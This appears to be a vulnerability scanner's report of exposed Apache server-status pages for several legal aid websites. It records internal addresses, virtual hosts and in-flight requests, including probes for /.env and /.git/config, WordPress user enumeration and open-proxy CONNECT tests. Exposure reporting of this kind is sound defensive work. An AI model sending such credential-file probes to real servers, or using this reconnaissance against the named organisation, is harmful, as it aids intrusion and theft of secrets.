"I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-29277751/62/2247K 6.38124166.82.8891.90 130.176.189.206http/1.1atlantalegalaid.org:8080GET /buy.php HTTP/1.1 1-29317980/0/2268_ 6.74100.00.0089.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-29277800/99/2278_ 8.858200.01.7776.88 45.91.23.135http/1.1 3-29294923/65/2239K 3.192229200.50.9691.49 130.176.189.210http/1.1atlantalegalaid.org:8080GET /admin.php HTTP/1.1 4-29251721/67/2103K 5.9935651.12.3489.48 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766633219.303596973419189 5-292995025/46/1886W 0.440029.90.1789.81 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 6-29318030/0/2234_ 0.00000.00.0094.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-29258451/103/2028K 6.57023966.83.8470.57 130.176.189.247http/1.1atlantalegalaid.org:8080GET /edit.php HTTP/1.1 8-29258500/161/1974_ 11.958600.04.5565.39 45.91.23.135http/1.1 9-29318040/0/1684_ 0.00000.00.0059.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-29299571/90/1700K 1.54123866.80.7164.23 130.176.189.239http/1.1atlantalegalaid.org:8080GET /cgi-bin/ HTTP/1.1 11-29307481/14/1458K 0.21332281.30.2456.53 15.158.254.200http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-29258650/79/1219_ 8.978500.03.8842.86 184.75.208.246http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 13-28-0/0/565. 3.47757212130.00.0018.35 15.158.40.136http/1.1atlantalegalaid.org:8080GET /application/.env HTTP/1.1 14-28-0/0/808. 2.18757211530.00.0030.64 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766553623.606631994247436 15-28-0/0/377. 0.0011120000.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-28-0/0/491. 0.0011119900.00.0026.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-28-0/0/175. 0.0011125100.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-28-0/0/7. 0.0011125000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-28-0/0/14. 0.0011124900.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00180629100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00180629000.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00180628900.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00180628700.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00180628800.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed5d8e2e1f
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 23-Dec-2025 06:13:56 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 27 days 13 hours 37 minutes 4 seconds Server load: 0.00 0.00 0.00 Total accesses: 25942 - Total Traffic: 987.2 MB CPU Usage: u98.05 s6.95 cu0 cs0 - .00441% CPU load .0109 requests/sec - 434 B/second - 39.0 kB/request 1 requests currently being processed, 9 idle workers _W_._._____._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-27170290/6/2130_ 0.9314882100.00.3377.57 130.176.189.206http/1.1atlantalegalaid.org:8080GET /wp-includes/theme-compat HTTP/1.1 1-271032525/223/2082W 18.740029.98.3274.65 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 2-27149390/60/2104_ 3.167402250.01.2872.05 162.142.125.210http/1.1atlantalegalaid.org:8080\x16\x03\x01 3-27-0/0/2081. 16.31148600.00.0086.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-27170340/6/1988_ 0.7173700.00.2085.53 162.142.125.210http/1.1atlantalegalaid.org:8080GET /wiki HTTP/1.1 5-27-0/0/1740. 3.02148700.00.0085.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-27165730/39/2081_ 6.0214892100.02.1887.59 130.176.189.207http/1.1atlantalegalaid.org:8080GET /wp-includes/rest-api HTTP/1.1 7-27106150/63/1835_ 7.237532110.02.6864.43 162.142.125.210http/1.1atlantalegalaid.org:8080\x16\x03\x01 8-27165780/20/1775_ 2.707472220.01.0559.70 162.142.125.210http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 9-27108970/153/1526_ 11.9275000.04.1454.11 162.142.125.210http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-27109020/101/1493_ 14.8814882170.04.9851.86 130.176.189.239http/1.1atlantalegalaid.org:8080GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.1 11-27-0/0/1426. 2.39148500.00.0055.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-27170390/2/1120_ 0.2614901270.00.0738.12 130.176.189.200http/1.1atlantalegalaid.org:8080GET /wp-includes/pomo/index.php HTTP/1.1 13-27-0/0/539. 0.007844100.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-27-0/0/790. 8.27741500.00.0029.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-27-0/0/374. 8.46741300.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-27-0/0/487. 0.007844600.00.0026.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-27-0/0/174. 0.007844500.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00164350500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00164350400.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00164350300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00164350200.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00164350100.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00164349900.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00164350000.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed8e6e3974
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 20-Dec-2025 23:31:12 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 26 Parent Server MPM Generation: 25 Server uptime: 25 days 6 hours 54 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 23703 - Total Traffic: 904.9 MB CPU Usage: u65.07 s4.91 cu0 cs0 - .0032% CPU load .0108 requests/sec - 434 B/second - 39.1 kB/request 1 requests currently being processed, 9 idle workers ___.__W__._._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-25301960/19/1987_ 2.1821162260.00.6872.50 15.158.226.111http/1.1atlantalegalaid.org:8080GET /wp-includes/id3/license.txt/wp-login.php HTTP/1.1 1-25271700/67/1769_ 4.732933150.01.8164.22 15.158.16.204http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.js 2-25270360/31/1872_ 3.9310601320.00.9664.66 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766272404.694600105285644 3-25-0/0/1848. 5.69539000.00.0076.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-25270210/128/1855_ 8.34165400.04.3079.76 87.121.84.180http/1.1atlantalegalaid.org:8080GET http://httpbin.org/ip HTTP/1.1 5-25275450/34/1636_ 4.75250900.01.5980.58 204.76.203.18http/1.1atlantalegalaid.org:8080GET /backup/ HTTP/1.1 6-252857425/69/1912W 5.730030.02.1380.07 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 7-25270310/54/1726_ 7.799472650.02.9059.70 15.158.40.136http/1.1atlantalegalaid.org:8080POST / HTTP/1.1 8-25318880/5/1682_ 0.5221171550.00.1356.16 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766271348.362819910049438 9-25-0/0/1304. 4.91539100.00.0048.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-25318930/4/1310_ 0.6521162530.00.2044.82 15.158.226.76http/1.1atlantalegalaid.org:8080GET /wp-includes/id3/license.txt/feed/ HTTP/1.1 11-24-0/0/1365. 6.377099800.00.0053.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-25270220/57/1030_ 8.7810422640.02.6835.83 130.176.185.46http/1.1atlantalegalaid.org:8080POST / HTTP/1.1 13-23-0/0/537. 0.0020068400.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-23-0/0/728. 0.5220063100.00.0026.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-23-0/0/286. 0.0020068100.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-23-0/0/486. 1.8214797100.00.0026.85 149.40.49.208http/1.1 17-21-0/0/173. 3.2733597000.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00144654200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00144654100.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00144654000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00144653900.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00144653800.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00144653600.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00144653700.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed38c5c5e6
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 19-Dec-2025 01:03:09 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 23 days 8 hours 26 minutes 18 seconds Server load: 0.00 0.00 0.00 Total accesses: 21898 - Total Traffic: 838.6 MB CPU Usage: u49.15 s3.9 cu0 cs0 - .00263% CPU load .0109 requests/sec - 435 B/second - 39.2 kB/request 1 requests currently being processed, 9 idle workers ____._.._.__W..._............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-23118410/55/1858_ 6.79484230.02.3167.48 130.176.187.230http/1.1elearning.alas.org:8080GET /pluginfile.php/1/theme_boost/backgroundimage/1763499490/ci 1-23172240/3/1624_ 0.2860581250.00.0759.49 13.89.124.221http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 2-23151370/24/1767_ 2.80484340.00.7460.28 130.176.187.214http/1.1elearning.alas.org:8080GET /pluginfile.php?file=%2F74%2Fcourse%2Foverviewfiles%2F1.png 3-23118390/133/1710_ 8.33484210.02.9772.30 130.176.187.230http/1.1elearning.alas.org:8080GET /theme/image.php/boost/core/1763499490/i/course HTTP/1.1 4-23-0/0/1610. 1.49639900.00.0070.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-23151250/17/1517_ 1.38484410.00.4875.07 130.176.187.246http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css 6-23-0/0/1733. 0.19639800.00.0072.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-23-0/0/1601. 3.053334900.00.0054.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-23124040/43/1539_ 5.81400800.01.9851.95 45.38.44.221http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 9-23-0/0/1198. 0.003340300.00.0045.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-23124090/76/1241_ 4.8048432410.03.1742.14 130.176.187.214http/1.1elearning.alas.org:8080GET /theme/styles.php?theme=boost&rev=1763499490_1&type=all HTT 11-23124140/73/1271_ 6.01238100.01.6448.93 15.158.40.136http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-231241925/74/859W 6.530029.92.5230.38 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 13-23-0/0/537. 0.003340100.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-23-0/0/728. 0.523334800.00.0026.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-23-0/0/286. 0.003339800.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-23151630/16/449_ 1.80459800.00.6726.75 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 17-21-0/0/173. 3.2716868800.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00127925900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00127925800.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00127925700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00127925600.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00127925500.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00127925300.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00127925400.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed50876b26
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 16-Dec-2025 23:50:59 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 21 days 7 hours 14 minutes 7 seconds Server load: 0.00 0.00 0.00 Total accesses: 20766 - Total Traffic: 790.5 MB CPU Usage: u34.7 s2.76 cu0 cs0 - .00204% CPU load .0113 requests/sec - 450 B/second - 39.0 kB/request 1 requests currently being processed, 9 idle workers _____.._._.__....W.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-21290090/118/1759_ 3.54175000.01.7663.46 130.176.137.70http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-21322270/24/1547_ 0.3536002070.00.0856.40 164.52.24.188http/1.1atlantalegalaid.org:8080\x16\x03\x01\x02 2-21289510/82/1652_ 3.53357200.00.9257.16 204.76.203.214http/1.1atlantalegalaid.org:8080GET /SDK/webLanguage HTTP/1.1 3-21289520/43/1529_ 3.39331800.01.1767.43 130.176.137.70http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 4-21322370/15/1536_ 0.01141800.00.4167.13 167.99.55.121http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 5-21-0/0/1457. 1.632866900.00.0064.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-21-0/0/1680. 3.242867100.00.0070.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-21309930/105/1553_ 1.5540161980.00.5552.16 167.71.139.216http/1.1atlantalegalaid.org:8080\x16\x03\x01\x05\xc4\x01 8-21-0/0/1471. 1.512867200.00.0048.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-21322420/60/1150_ 0.94358400.00.0644.43 164.52.24.188http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 10-21-0/0/1151. 0.002867300.00.0038.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-21322520/14/1168_ 0.00141800.00.6045.90 167.99.55.121http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-21322570/13/781_ 0.00358000.00.0127.80 91.224.92.121http/1.1atlantalegalaid.org:8080OPTIONS / HTTP/1.1 13-21-0/0/536. 7.382867000.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-20-0/0/724. 0.538970400.00.0026.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-20-0/0/285. 2.987758000.00.004.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-20-0/0/433. 4.116557700.00.0026.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-212897425/69/157W 2.770029.90.994.89 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 18-8-0/0/6. 0.00110212800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00110212700.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00110212600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00110212500.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00110212400.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00110212200.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00110212300.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edb55c1344
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 12-Dec-2025 21:53:38 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 17 days 5 hours 16 minutes 47 seconds Server load: 0.00 0.00 0.00 Total accesses: 16629 - Total Traffic: 649.3 MB CPU Usage: u69.81 s5.31 cu0 cs0 - .00505% CPU load .0112 requests/sec - 457 B/second - 40.0 kB/request 1 requests currently being processed, 9 idle workers _____W_.___..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-17307470/40/1413_ 4.9613100.01.6652.52 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 1-17311270/34/1210_ 3.9613200.01.4045.76 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 2-17311340/83/1303_ 6.0713100.01.9946.20 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 3-17321120/62/1176_ 2.9313100.01.0445.65 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 4-17316450/41/1195_ 5.3213100.01.8656.15 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 5-173070925/74/1194W 6.180029.92.1454.24 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 6-17306990/44/1365_ 5.6945700.02.0461.59 176.65.132.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-17-0/0/1255. 1.632033700.00.0045.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-17316500/67/1258_ 3.5213100.02.3140.56 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 9-17316550/30/854_ 3.5413000.01.1336.43 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 10-1717870/12/977_ 1.2813100.00.4032.26 36.255.98.221http/1.1atlantalegalaid.org:8080CONNECT google.com:443 HTTP/1.1 11-17-0/0/935. 3.093894400.00.0037.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-16-0/0/597. 6.986866900.00.0021.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-15-0/0/258. 0.0016905900.00.008.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-15-0/0/720. 0.0016906100.00.0026.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-15-0/0/265. 5.9314767400.00.003.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-17-0/0/403. 8.802033600.00.0024.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-15-0/0/54. 5.2421147800.00.002.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.0074948800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.0074948700.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.0074948600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.0074948500.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.0074948400.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.0074948200.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.0074948300.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edbbffd2b4
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 01-Dec-2025 04:37:37 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 5 days 12 hours 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 4394 - Total Traffic: 158.1 MB CPU Usage: u17.84 s1.78 cu0 cs0 - .00413% CPU load .00925 requests/sec - 348 B/second - 36.8 kB/request 1 requests currently being processed, 9 idle workers ____.W__.__._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-549000/58/350_ 1.8515719630.00.3410.33 15.158.254.235http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1764562284.303761005401611 1-565090/9/361_ 0.3415653260.00.288.73 15.158.254.235http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-547380/94/418_ 1.13146890.00.9510.89 130.176.208.182http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-550500/41/213_ 3.524100.01.449.14 130.176.208.182http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-5-0/0/319. 0.585907100.00.0010.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-5475224/74/322W 0.680028.39.5718.39 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 6-550590/49/365_ 5.51533400.011.1821.91 3.129.63.56http/1.1atlantalegalaid.org:8080GET /cgi-bin/authLogin.cgi HTTP/1.1 7-563570/73/400_ 0.27156411730.01.4111.97 130.176.187.246http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-5-0/0/342. 0.005907700.00.009.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-564790/13/189_ 0.1515192750.00.569.37 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-564840/11/323_ 0.53570300.00.108.80 15.158.40.136http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 11-5-0/0/191. 0.005907600.00.007.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-564940/17/238_ 1.31628100.00.517.57 179.1.74.211http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-5-0/0/181. 0.005907500.00.006.35 